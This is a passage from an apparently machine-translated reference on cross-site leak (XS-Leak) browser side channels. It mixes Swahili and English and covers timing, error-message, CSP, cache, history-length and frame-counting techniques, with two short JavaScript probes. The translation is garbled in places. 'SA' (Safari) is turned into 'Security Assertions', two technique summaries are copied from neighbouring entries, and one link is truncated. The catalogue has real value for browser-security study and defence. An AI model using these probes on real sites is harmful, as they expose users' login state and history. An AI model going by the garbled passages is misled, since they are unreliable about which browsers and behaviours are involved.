- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Kipengee cha muda wa rasilimali kinavuja wakati wa kuanza kwa uelekezaji.
- Code Example: https://xsinator.com/testing.html#Redirect%20Start%20Leak
Tulifanya uchunguzi mmoja wa XS-Leak ambao unatumia tabia ya vivinjari vingine ambavyo vinaandika taarifa nyingi sana kwa maombi ya cross-origin. Kiwango kinatambua subset ya sifa ambazo zinapaswa kuwekwa sifuri kwa rasilimali za cross-origin. Hata hivyo, katika SA inawezekana kugundua ikiwa mtumiaji anahamishwa na ukurasa wa lengo, kwa kuhoji Performance API na kuangalia data ya muda wa redirectStart.
Duration Redirect Leak
- Inclusion Methods: Fetch API
- Detectable Difference: Redirect
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Muda wa kuingia kwa muda ni hasi wakati uelekezaji unapotokea.
- Code Example: https://xsinator.com/testing.html#Duration%20Redirect%20Leak
Katika GC, muda wa maombi yanayosababisha uelekezaji ni hasi na hivyo inaweza kutofautishwa na maombi ambayo hayasababisha uelekezaji.
CORP Leak
- Inclusion Methods: Frames
- Detectable Difference: Header
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Rasilimali iliyo na ulinzi wa CORP haizalishi kipengee cha muda wa rasilimali.
- Code Example: https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak
Katika baadhi ya matukio, kipengee cha nextHopProtocol kinaweza kutumika kama mbinu ya kuvuja. Katika GC, wakati kichwa cha CORP kimewekwa, nextHopProtocol itakuwa tupu. Kumbuka kwamba SA haitaunda kipengee cha utendaji kabisa kwa rasilimali zilizo na CORP.
Service Worker
- Inclusion Methods: Frames
- Detectable Difference: API Usage
- More info: https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/
- Summary: Gundua ikiwa huduma ya kazi imeandikishwa kwa asili maalum.
- Code Example:
Huduma za kazi ni muktadha wa skripti unaotegemea matukio ambayo yanafanya kazi katika asili. Zinakimbia katika nyuma ya ukurasa wa wavuti na zinaweza kukamata, kubadilisha, na kuficha rasilimali ili kuunda programu za wavuti zisizo na mtandao.
Ikiwa rasilimali iliyofichwa na huduma ya kazi inafikiwa kupitia iframe, rasilimali hiyo itakuwa imepakuliwa kutoka kwenye cache ya huduma ya kazi.
Ili kugundua ikiwa rasilimali hiyo ilipakuliwa kutoka kwenye cache ya huduma ya kazi, Performance API inaweza kutumika.
Hii inaweza pia kufanywa kwa shambulio la Timing (angalia karatasi kwa maelezo zaidi).
Cache
- Inclusion Methods: Fetch API
- Detectable Difference: Timing
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources
- Summary: Inawezekana kuangalia ikiwa rasilimali ilihifadhiwa kwenye cache.
- Code Example: https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources, https://xsinator.com/testing.html#Cache%20Leak%20(POST)
Kwa kutumia Performance API inawezekana kuangalia ikiwa rasilimali imehifadhiwa.
Network Duration
- Inclusion Methods: Fetch API
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration
- Summary: Inawezekana kupata muda wa mtandao wa ombi kutoka kwa
performance
API. - Code Example: https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration
Error Messages Technique
Media Error
- Inclusion Methods: HTML Elements (Video, Audio)
- Detectable Difference: Status Code
- More info: https://bugs.chromium.org/p/chromium/issues/detail?id=828265
- Summary: Katika Firefox inawezekana kuvuja kwa usahihi msimbo wa hali wa ombi la cross-origin.
- Code Example: https://jsbin.com/nejatopusi/1/edit?html,css,js,output
// Code saved here in case it dissapear from the link
// Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
window.addEventListener("load", startup, false);
function displayErrorMessage(msg) {
document.getElementById("log").innerHTML += msg;
}
function startup() {
let audioElement = document.getElementById("audio");
// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
document.getElementById("startTest").addEventListener("click", function() {
audioElement.src = document.getElementById("testUrl").value;
}, false);
// Create the event handler
var errHandler = function() {
let err = this.error;
let message = err.message;
let status = "";
// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
// Firefox error.message when the request loads successfully: "Failed to init decoder"
if((message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1) || (message.indexOf("Failed to init decoder") != -1)){
status = "Success";
}else{
status = "Error";
}
displayErrorMessage("<strong>Status: " + status + "</strong> (Error code:" + err.code + " / Error Message: " + err.message + ")<br>");
};
audioElement.onerror = errHandler;
}
The MediaError
interface's message property uniquely identifies resources that load successfully with a distinct string. An attacker can exploit this feature by observing the message content, thereby deducing the response status of a cross-origin resource.
CORS Error
- Inclusion Methods: Fetch API
- Detectable Difference: Header
- More info: https://xsinator.com/paper.pdf (5.3)
- Summary: Katika Madai ya Usalama (SA), ujumbe wa kosa la CORS bila kukusudia unafichua URL kamili ya maombi yaliyorejelewa.
- Code Example: https://xsinator.com/testing.html#CORS%20Error%20Leak
This technique enables an attacker to extract the destination of a cross-origin site's redirect by exploiting how Webkit-based browsers handle CORS requests. Specifically, when a CORS-enabled request is sent to a target site that issues a redirect based on user state and the browser subsequently denies the request, the full URL of the redirect's target is disclosed within the error message. This vulnerability not only reveals the fact of the redirect but also exposes the redirect's endpoint and any sensitive query parameters it may contain.
SRI Error
- Inclusion Methods: Fetch API
- Detectable Difference: Header
- More info: https://xsinator.com/paper.pdf (5.3)
- Summary: Katika Madai ya Usalama (SA), ujumbe wa kosa la CORS bila kukusudia unafichua URL kamili ya maombi yaliyorejelewa.
- Code Example: https://xsinator.com/testing.html#SRI%20Error%20Leak
An attacker can exploit verbose error messages to deduce the size of cross-origin responses. This is possible due to the mechanism of Subresource Integrity (SRI), which uses the integrity attribute to validate that resources fetched, often from CDNs, haven't been tampered with. For SRI to work on cross-origin resources, these must be CORS-enabled; otherwise, they're not subject to integrity checks. In Security Assertions (SA), much like the CORS error XS-Leak, an error message can be captured after a fetch request with an integrity attribute fails. Attackers can deliberately trigger this error by assigning a bogus hash value to the integrity attribute of any request. In SA, the resulting error message inadvertently reveals the content length of the requested resource. This information leakage allows an attacker to discern variations in response size, paving the way for sophisticated XS-Leak attacks.
CSP Violation/Detection
- Inclusion Methods: Pop-ups
- Detectable Difference: Status Code
- More info: https://bugs.chromium.org/p/chromium/issues/detail?id=313737, https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html, https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects
- Summary: Kutoa tu tovuti ya waathirika katika CSP ikiwa tumeipata inajaribu kuelekeza kwenye kikoa tofauti CSP itasababisha kosa linaloweza kugundulika.
- Code Example: https://xsinator.com/testing.html#CSP%20Violation%20Leak, https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation
A XS-Leak can use the CSP to detect if a cross-origin site was redirected to a different origin. This leak can detect the redirect, but additionally, the domain of the redirect target leaks. The basic idea of this attack is to allow the target domain on the attacker site. Once a request is issued to the target domain, it redirects to a cross-origin domain. CSP blocks the access to it and creates a violation report used as a leak technique. Depending on the browser, this report may leak the target location of the redirect.
Modern browsers won't indicate the URL it was redirected to, but you can still detect that a cross-origin redirect was triggered.
Cache
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events, https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html
- Summary: Futa faili kutoka kwenye cache. Fungua ukurasa wa lengo angalia ikiwa faili ipo kwenye cache.
- Code Example:
Browsers might use one shared cache for all websites. Regardless of their origin, it is possible to deduct whether a target page has requested a specific file.
If a page loads an image only if the user is logged in, you can invalidate the resource (so it's no longer cached if it was, see more info links), perform a request that could load that resource and try to load the resource with a bad request (e.g. using an overlong referer header). If the resource load didn't trigger any error, it's because it was cached.
CSP Directive
- Inclusion Methods: Frames
- Detectable Difference: Header
- More info: https://bugs.chromium.org/p/chromium/issues/detail?id=1105875
- Summary: Miongozo ya kichwa cha CSP inaweza kuchunguzwa kwa kutumia sifa ya iframe ya CSP, ikifichua maelezo ya sera.
- Code Example: https://xsinator.com/testing.html#CSP%20Directive%20Leak
A novel feature in Google Chrome (GC) allows web pages to propose a Content Security Policy (CSP) by setting an attribute on an iframe element, with policy directives transmitted along with the HTTP request. Normally, the embedded content must authorize this via an HTTP header, or an error page is displayed. However, if the iframe is already governed by a CSP and the newly proposed policy isn't more restrictive, the page will load normally. This mechanism opens a pathway for an attacker to detect specific CSP directives of a cross-origin page by identifying the error page. Although this vulnerability was marked as fixed, our findings reveal a new leak technique capable of detecting the error page, suggesting that the underlying problem was never fully addressed.
CORP
- Inclusion Methods: Fetch API
- Detectable Difference: Header
- More info: https://xsleaks.dev/docs/attacks/browser-features/corp/
- Summary: Rasilimali zilizolindwa na Sera ya Rasilimali za Mipaka ya Mipango (CORP) zitatupa kosa wakati zinapojaribiwa kutoka kwa asili isiyoruhusiwa.
- Code Example: https://xsinator.com/testing.html#CORP%20Leak
The CORP header is a relatively new web platform security feature that when set blocks no-cors cross-origin requests to the given resource. The presence of the header can be detected, because a resource protected with CORP will throw an error when fetched.
CORB
- Inclusion Methods: HTML Elements
- Detectable Difference: Headers
- More info: https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header
- Summary: CORB can allow attackers to detect when the
nosniff
header is present in the request. - Code Example: https://xsinator.com/testing.html#CORB%20Leak
Check the link for more information about the attack.
CORS error on Origin Reflection misconfiguration
- Inclusion Methods: Fetch API
- Detectable Difference: Headers
- More info: https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration
- Summary: Ikiwa kichwa cha Asili kinarejelewa katika kichwa
Access-Control-Allow-Origin
inawezekana kuangalia ikiwa rasilimali iko kwenye cache tayari. - Code Example: https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration
In case the Origin header is being reflected in the header Access-Control-Allow-Origin
an attacker can abuse this behaviour to try to fetch the resource in CORS mode. If an error isn't triggered, it means that it was correctly retrieved form the web, if an error is triggered, it's because it was accessed from the cache (the error appears because the cache saves a response with a CORS header allowing the original domain and not the attackers domain).
Note that if the origin isn't reflected but a wildcard is used (Access-Control-Allow-Origin: *
) this won't work.
Readable Attributes Technique
Fetch Redirect
- Inclusion Methods: Fetch API
- Detectable Difference: Status Code
- More info: https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html
- Summary: GC na SA zinaruhusu kuangalia aina ya majibu (opaque-redirect) baada ya kuelekeza kumalizika.
- Code Example: https://xsinator.com/testing.html#Fetch%20Redirect%20Leak
Submitting a request using the Fetch API with redirect: "manual"
and other params, it's possible to read the response.type
attribute and if it's equals to opaqueredirect
then the response was a redirect.
COOP
- Inclusion Methods: Pop-ups
- Detectable Difference: Header
- More info: https://xsinator.com/paper.pdf (5.4), https://xsleaks.dev/docs/attacks/window-references/
- Summary: Kurasa zilizolindwa na Sera ya Mfunguo wa Mipaka ya Mipango (COOP) zinazuia ufikiaji kutoka kwa mwingiliano wa mipango tofauti.
- Code Example: https://xsinator.com/testing.html#COOP%20Leak
An attacker is capable of deducing the presence of the Cross-Origin Opener Policy (COOP) header in a cross-origin HTTP response. COOP is utilized by web applications to hinder external sites from obtaining arbitrary window references. The visibility of this header can be discerned by attempting to access the contentWindow
reference. In scenarios where COOP is applied conditionally, the opener
property becomes a telltale indicator: it's undefined when COOP is active, and defined in its absence.
URL Max Length - Server Side
- Inclusion Methods: Fetch API, HTML Elements
- Detectable Difference: Status Code / Content
- More info: https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects
- Summary: Gundua tofauti katika majibu kwa sababu ya urefu wa majibu ya kuelekeza unaweza kuwa mrefu sana kwamba seva inajibu kwa kosa na tahadhari inaundwa.
- Code Example: https://xsinator.com/testing.html#URL%20Max%20Length%20Leak
If a server-side redirect uses user input inside the redirection and extra data. It's possible to detect this behaviour because usually servers has a limit request length. If the user data is that length - 1, because the redirect is using that data and adding something extra, it will trigger an error detectable via Error Events.
If you can somehow set cookies to a user, you can also perform this attack by setting enough cookies (cookie bomb) so with the response increased size of the correct response an error is triggered. In this case, remember that is you trigger this request from a same site, <script>
will automatically send the cookies (so you can check for errors).
An example of the cookie bomb + XS-Search can be found in the Intended solution of this writeup: https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended
SameSite=None
or to be in the same context is usually needed for this type of attack.
URL Max Length - Client Side
- Inclusion Methods: Pop-ups
- Detectable Difference: Status Code / Content
- More info: https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit
- Summary: Gundua tofauti katika majibu kwa sababu ya urefu wa majibu ya kuelekeza unaweza kuwa mrefu sana kwa ombi kwamba tofauti inaweza kuonekana.
- Code Example: https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit
According to Chromium documentation, Chrome's maximum URL length is 2MB.
In general, the web platform does not have limits on the length of URLs (although 2^31 is a common limit). Chrome limits URLs to a maximum length of 2MB for practical reasons and to avoid causing denial-of-service problems in inter-process communication.
Therefore if the redirect URL responded is larger in one of the cases, it's possible to make it redirect with a URL larger than 2MB to hit the length limit. When this happens, Chrome shows an about:blank#blocked
page.
The noticeable difference, is that if the redirect was completed, window.origin
throws an error because a cross origin cannot access that info. However, if the limit was **** hit and the loaded page was about:blank#blocked
the window's origin
remains that of the parent, which is an accessible information.
All the extra info needed to reach the 2MB can be added via a hash in the initial URL so it will be used in the redirect.
{% content-ref url="url-max-length-client-side.md" %} url-max-length-client-side.md {% endcontent-ref %}
Max Redirects
- Inclusion Methods: Fetch API, Frames
- Detectable Difference: Status Code
- More info: https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76
- Summary: Tumia kikomo cha kuelekeza cha kivinjari ili kubaini kuwepo kwa kuelekeza URL.
- Code Example: https://xsinator.com/testing.html#Max%20Redirect%20Leak
If the max number of redirects to follow of a browser is 20, an attacker could try to load his page with 19 redirects and finally send the victim to the tested page. If an error is triggered, then the page was trying to redirect the victim.
History Length
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: Redirects
- More info: https://xsleaks.dev/docs/attacks/navigations/
- Summary: JavaScript code manipulates the browser history and can be accessed by the length property.
- Code Example: https://xsinator.com/testing.html#History%20Length%20Leak
The History API allows JavaScript code to manipulate the browser history, which saves the pages visited by a user. An attacker can use the length property as an inclusion method: to detect JavaScript and HTML navigation.
Checking history.length
, making a user navigate to a page, change it back to the same-origin and checking the new value of history.length
.
History Length with same URL
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: If URL is the same as the guessed one
- Summary: Inawezekana kudhani ikiwa eneo la fremu/popup liko katika URL maalum kwa kutumia urefu wa historia.
- Code Example: Below
An attacker could use JavaScript code to manipulate the frame/pop-up location to a guessed one and immediately change it to about:blank
. If the history length increased it means the URL was correct and it had time to increase because the URL isn't reloaded if it's the same. If it didn't increased it means it tried to load the guessed URL but because we immediately after loaded about:blank
, the history length did never increase when loading the guessed url.
async function debug(win, url) {
win.location = url + '#aaa';
win.location = 'about:blank';
await new Promise(r => setTimeout(r, 500));
return win.history.length;
}
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=c"));
win.close();
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=b"));
Frame Counting
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/frame-counting/
- Summary: Tathmini idadi ya vipengele vya iframe kwa kukagua mali ya
window.length
. - Code Example: https://xsinator.com/testing.html#Frame%20Count%20Leak
Kuhesabu idadi ya frames katika wavuti iliyofunguliwa kupitia iframe
au window.open
kunaweza kusaidia kubaini hali ya mtumiaji juu ya ukurasa huo.
Zaidi ya hayo, ikiwa ukurasa una idadi ile ile ya frames kila wakati, kuangalia kuendelea idadi ya frames kunaweza kusaidia kubaini mwelekeo ambao unaweza kuvuja taarifa.
Mfano wa mbinu hii ni kwamba katika chrome, PDF inaweza kutambuliwa kwa kuhesabu frames kwa sababu embed
inatumika ndani. Kuna Open URL Parameters ambazo zinatoa udhibiti fulani juu ya maudhui kama vile zoom
, view
, page
, toolbar
ambapo mbinu hii inaweza kuwa ya kuvutia.
HTMLElements
- Inclusion Methods: HTML Elements
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/element-leaks/
- Summary: Soma thamani iliyovuja ili kutofautisha kati ya hali 2 zinazowezekana
- Code Example: https://xsleaks.dev/docs/attacks/element-leaks/, https://xsinator.com/testing.html#Media%20Dimensions%20Leak, https://xsinator.com/testing.html#Media%20Duration%20Leak
Uvujaji wa taarifa kupitia vipengele vya HTML ni wasiwasi katika usalama wa wavuti, hasa wakati faili za media za kidinamik zinaundwa kulingana na taarifa za mtumiaji, au wakati alama za maji zinaongezwa, kubadilisha ukubwa wa media. Hii inaweza kutumiwa na washambuliaji kutofautisha kati ya hali zinazowezekana kwa kuchambua taarifa zinazofichuliwa na vipengele fulani vya HTML.
Information Exposed by HTML Elements
- HTMLMediaElement: Kipengele hiki kinafichua
duration
nabuffered
za media, ambazo zinaweza kufikiwa kupitia API yake. Soma zaidi kuhusu HTMLMediaElement - HTMLVideoElement: Inafichua
videoHeight
navideoWidth
. Katika baadhi ya vivinjari, mali za ziada kamawebkitVideoDecodedByteCount
,webkitAudioDecodedByteCount
, nawebkitDecodedFrameCount
zinapatikana, zikitoa taarifa zaidi kuhusu maudhui ya media. Soma zaidi kuhusu HTMLVideoElement - getVideoPlaybackQuality(): Kazi hii inatoa maelezo kuhusu ubora wa upigaji video, ikiwa ni pamoja na
totalVideoFrames
, ambayo inaweza kuashiria kiasi cha data ya video iliyop processed. Soma zaidi kuhusu getVideoPlaybackQuality() - HTMLImageElement: Kipengele hiki kinavuja
height
nawidth
ya picha. Hata hivyo, ikiwa picha ni batili, mali hizi zitarudisha 0, na kazi yaimage.decode()
itakataliwa, ikionyesha kushindwa kwa kupakia picha ipasavyo. Soma zaidi kuhusu HTMLImageElement
CSS Property
- Inclusion Methods: HTML Elements
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle, https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html
- Summary: Tambua tofauti katika mtindo wa wavuti zinazohusiana na hali au hadhi ya mtumiaji.
- Code Example: https://xsinator.com/testing.html#CSS%20Property%20Leak
Programu za wavuti zinaweza kubadilisha mtindo wa wavuti kulingana na hali ya mtumiaji. Faili za CSS za msalaba zinaweza kuingizwa kwenye ukurasa wa mshambuliaji kwa kutumia kipengele cha HTML link, na kanuni zitatumika kwenye ukurasa wa mshambuliaji. Ikiwa ukurasa unabadilisha kanuni hizi kwa njia ya kidinamik, mshambuliaji anaweza kutambua tofauti hizi kulingana na hali ya mtumiaji.
Kama mbinu ya uvujaji, mshambuliaji anaweza kutumia njia ya window.getComputedStyle
ili kusoma CSS mali za kipengele maalum cha HTML. Kama matokeo, mshambuliaji anaweza kusoma mali za CSS zisizo na mipaka ikiwa kipengele kilichohusika na jina la mali kinajulikana.
CSS History
- Inclusion Methods: HTML Elements
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history
- Summary: Tambua ikiwa mtindo wa
:visited
umetumika kwa URL ikionyesha kuwa tayari imetembelewa - Code Example: http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html
{% hint style="info" %} Kulingana na hii, hii haifanyi kazi katika Chrome isiyo na kichwa. {% endhint %}
Mchoro wa CSS :visited
unatumika kubadilisha mtindo wa URLs tofauti ikiwa tayari zimetembelewa na mtumiaji. Katika siku za nyuma, njia ya getComputedStyle()
inaweza kutumika kutambua tofauti hizi za mtindo. Hata hivyo, vivinjari vya kisasa vimeanzisha hatua za usalama ili kuzuia njia hii kufichua hali ya kiungo. Hatua hizi ni pamoja na kurudisha kila wakati mtindo uliohesabiwa kana kwamba kiungo kimetembelewa na kuzuia mitindo inayoweza kutumika na mchoro wa :visited
.
Licha ya vizuizi hivi, inawezekana kutambua hali ya kutembelewa ya kiungo kwa njia isiyo ya moja kwa moja. Mbinu moja inahusisha kumdanganya mtumiaji kuingiliana na eneo lililoathiriwa na CSS, hasa kutumia mali ya mix-blend-mode
. Mali hii inaruhusu kuchanganya vipengele na mandharinyuma yao, ikifichua hali ya kutembelewa kulingana na mwingiliano wa mtumiaji.
Zaidi ya hayo, kutambua kunaweza kufanywa bila mwingiliano wa mtumiaji kwa kutumia nyakati za uwasilishaji wa viungo. Kwa kuwa vivinjari vinaweza kuwasilisha viungo vilivyotembelewa na visivyotembelewa tofauti, hii inaweza kuleta tofauti ya wakati inayoweza kupimwa katika uwasilishaji. Ushahidi wa dhana (PoC) ulitajwa katika ripoti ya hitilafu ya Chromium, ikionyesha mbinu hii kwa kutumia viungo vingi ili kuongeza tofauti ya wakati, hivyo kufanya hali ya kutembelewa iweze kutambuliwa kupitia uchambuzi wa wakati.
Kwa maelezo zaidi kuhusu mali hizi na mbinu, tembelea kurasa zao za hati:
:visited
: MDN DocumentationgetComputedStyle()
: MDN Documentationmix-blend-mode
: MDN Documentation
ContentDocument X-Frame Leak
- Inclusion Methods: Frames
- Detectable Difference: Headers
- More info: https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf
- Summary: Katika Google Chrome, ukurasa maalum wa makosa unaonyeshwa wakati ukurasa unazuiwa kuingizwa kwenye tovuti ya msalaba kutokana na vizuizi vya X-Frame-Options.
- Code Example: https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak
Katika Chrome, ikiwa ukurasa wenye kichwa cha X-Frame-Options
kimewekwa kuwa "deny" au "same-origin" umeingizwa kama kitu, ukurasa wa makosa unaonekana. Chrome inarudisha kipekee kitu cha hati tupu (badala ya null
) kwa mali ya contentDocument
ya kitu hiki, tofauti na katika iframes au vivinjari vingine. Washambuliaji wanaweza kutumia hii kwa kutambua hati tupu, ambayo inaweza kufichua taarifa kuhusu hali ya mtumiaji, hasa ikiwa waendelezaji wanaweka kichwa cha X-Frame-Options kwa kutokuweka sawa, mara nyingi wakisahau kurasa za makosa. Ufahamu na matumizi ya mara kwa mara ya vichwa vya usalama ni muhimu kwa kuzuia uvujaji kama huu.
Download Detection
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: Headers
- More info: https://xsleaks.dev/docs/attacks/navigations/#download-trigger
- Summary: Mshambuliaji anaweza kutambua upakuaji wa faili kwa kutumia iframes; upatikanaji wa kuendelea wa iframe unaashiria upakuaji wa faili uliofanikiwa.
- Code Example: https://xsleaks.dev/docs/attacks/navigations/#download-bar
Kichwa cha Content-Disposition
, hasa Content-Disposition: attachment
, kinaelekeza kivinjari kupakua maudhui badala ya kuyonyesha ndani. Tabia hii inaweza kutumiwa kugundua ikiwa mtumiaji ana ufikiaji wa ukurasa unaosababisha upakuaji wa faili. Katika vivinjari vya msingi vya Chromium, kuna mbinu chache za kutambua tabia hii ya upakuaji:
- Ufuatiliaji wa Upakuaji Bar:
- Wakati faili inapopakuliwa katika vivinjari vya msingi vya Chromium, upakuaji bar inaonekana chini ya dirisha la kivinjari.
- Kwa kufuatilia mabadiliko katika urefu wa dirisha, washambuliaji wanaweza kudhani kuonekana kwa upakuaji bar, ikionyesha kuwa upakuaji umeanzishwa.
- Upakuaji wa Navigesheni kwa Iframes:
- Wakati ukurasa unaposababisha upakuaji wa faili kwa kutumia kichwa cha
Content-Disposition: attachment
, haileti tukio la navigesheni. - Kwa kupakia maudhui katika iframe na kufuatilia matukio ya navigesheni, inawezekana kuangalia ikiwa usambazaji wa maudhui unasababisha upakuaji wa faili (hakuna navigesheni) au la.
- Upakuaji wa Navigesheni bila Iframes:
- Kama ilivyo katika mbinu ya iframe, mbinu hii inahusisha kutumia
window.open
badala ya iframe. - Kufuatilia matukio ya navigesheni katika dirisha lililofunguliwa jipya kunaweza kufichua ikiwa upakuaji wa faili ulianzishwa (hakuna navigesheni) au ikiwa maudhui yanaonyeshwa ndani (navigesheni inatokea).
Katika hali ambapo ni watumiaji walioingia tu wanaoweza kuanzisha upakuaji kama huu, mbinu hizi zinaweza kutumika kwa njia isiyo ya moja kwa moja kudhani hali ya uthibitisho wa mtumiaji kulingana na majibu ya kivinjari kwa ombi la upakuaji.
Partitioned HTTP Cache Bypass
- Inclusion Methods: Pop-ups
- Detectable Difference: Timing
- More info: https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass
- Summary: Mshambuliaji anaweza kutambua upakuaji wa faili kwa kutumia iframes; upatikanaji wa kuendelea wa iframe unaashiria upakuaji wa faili uliofanikiwa.
- Code Example: https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass, https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722 (kutoka https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)
{% hint style="warning" %}
Hii ndiyo sababu mbinu hii ni ya kuvutia: Chrome sasa ina cache partitioning, na funguo ya cache ya ukurasa uliofunguliwa mpya ni: (https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)
, lakini ikiwa nitafungua ukurasa wa ngrok na kutumia fetch ndani yake, funguo ya cache itakuwa: (https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)
, funguo ya cache ni tofauti, hivyo cache haiwezi kushirikiwa. Unaweza kupata maelezo zaidi hapa: Gaining security and privacy by partitioning the cache
(Comment kutoka hapa)
{% endhint %}
Ikiwa tovuti example.com
inajumuisha rasilimali kutoka *.example.com/resource
basi rasilimali hiyo itakuwa na funguo sawa ya caching kama rasilimali hiyo ilivyoombwa moja kwa moja kupitia navigesheni ya ngazi ya juu. Hii ni kwa sababu funguo ya caching inajumuisha ngazi ya juu eTLD+1 na frame eTLD+1.
Kwa sababu ufikiaji wa cache ni wa haraka zaidi kuliko kupakia rasilimali, inawezekana kujaribu kubadilisha eneo la ukurasa na kuifuta 20ms (kwa mfano) baada ya hapo. Ikiwa asili ilibadilishwa baada ya kusitisha, inamaanisha kuwa rasilimali ilihifadhiwa.
Au inaweza tu kutuma baadhi ya fetch kwa ukurasa unaoweza kuhifadhiwa na kupima muda inachukua.
Manual Redirect
- Inclusion Methods: Fetch API
- Detectable Difference: Redirects
- More info: ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234
- Summary: Inawezekana kugundua ikiwa jibu la ombi la fetch ni uelekeo
- Code Example:
Fetch with AbortController
- Inclusion Methods: Fetch API
- Detectable Difference: Timing
- More info: https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller
- Summary: Inawezekana kujaribu kupakia rasilimali na kuacha kabla ya kupakiwa, ikiwa ni pamoja na ikiwa kosa linatokea, rasilimali ilihifadhiwa au haikuhifadhiwa.
- Code Example: https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller
Tumia fetch na setTimeout na AbortController ili kugundua ikiwa rasilimali imehifadhiwa na kuondoa rasilimali maalum kutoka kwenye cache ya kivinjari. Zaidi ya hayo, mchakato huu unafanyika bila kuhifadhi maudhui mapya.
Script Pollution
- Inclusion Methods: HTML Elements (script)
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/element-leaks/#script-tag
- Summary: Inawezekana kufuta kazi zilizojengwa ndani na kusoma hoja zao hata kutoka cross-origin script (ambayo haiwezi kusomwa moja kwa moja), hii inaweza kuvuja taarifa muhimu.
- Code Example: https://xsleaks.dev/docs/attacks/element-leaks/#script-tag
Service Workers
- Inclusion Methods: Pop-ups
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers
- Summary: Pima muda wa utekelezaji wa wavuti kwa kutumia huduma za wafanyakazi.
- Code Example:
Katika hali iliyotolewa, mshambuliaji anachukua hatua ya kujiandikisha mshauri wa huduma ndani ya moja ya maeneo yao, hasa "attacker.com". Kisha, mshambuliaji anafungua dirisha jipya katika tovuti lengwa kutoka kwa hati kuu na kuagiza mshauri wa huduma kuanzisha kipima muda. Wakati dirisha jipya linaanza kupakia, mshambuliaji anahamisha rejeleo lililopatikana katika hatua ya awali kwenye ukurasa unaosimamiwa na mshauri wa huduma.
Pale ombi lililoanzishwa katika hatua ya awali linapofika, mshauri wa huduma unajibu kwa msimbo wa hali 204 (No Content), kwa ufanisi ukimaliza mchakato wa navigesheni. Wakati huu, mshauri wa huduma anachukua kipimo kutoka kwa kipima muda kilichozinduliwa mapema katika hatua ya pili. Kipimo hiki kinategemea muda wa JavaScript unaosababisha ucheleweshaji katika mchakato wa navigesheni.
{% hint style="warning" %} Katika muda wa utekelezaji inawezekana kuondoa vigezo vya mtandao ili kupata vipimo sahihi zaidi. Kwa mfano, kwa kupakia rasilimali zinazotumiwa na ukurasa kabla ya kuupakia. {% endhint %}
Fetch Timing
- Inclusion Methods: Fetch API
- Detectable Difference: Timing (kwa ujumla kutokana na Maudhui ya Ukurasa, Msimbo wa Hali)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks
- Summary: Tumia performance.now() kupima muda inachukua kufanya ombi. Saa nyingine zinaweza kutumika.
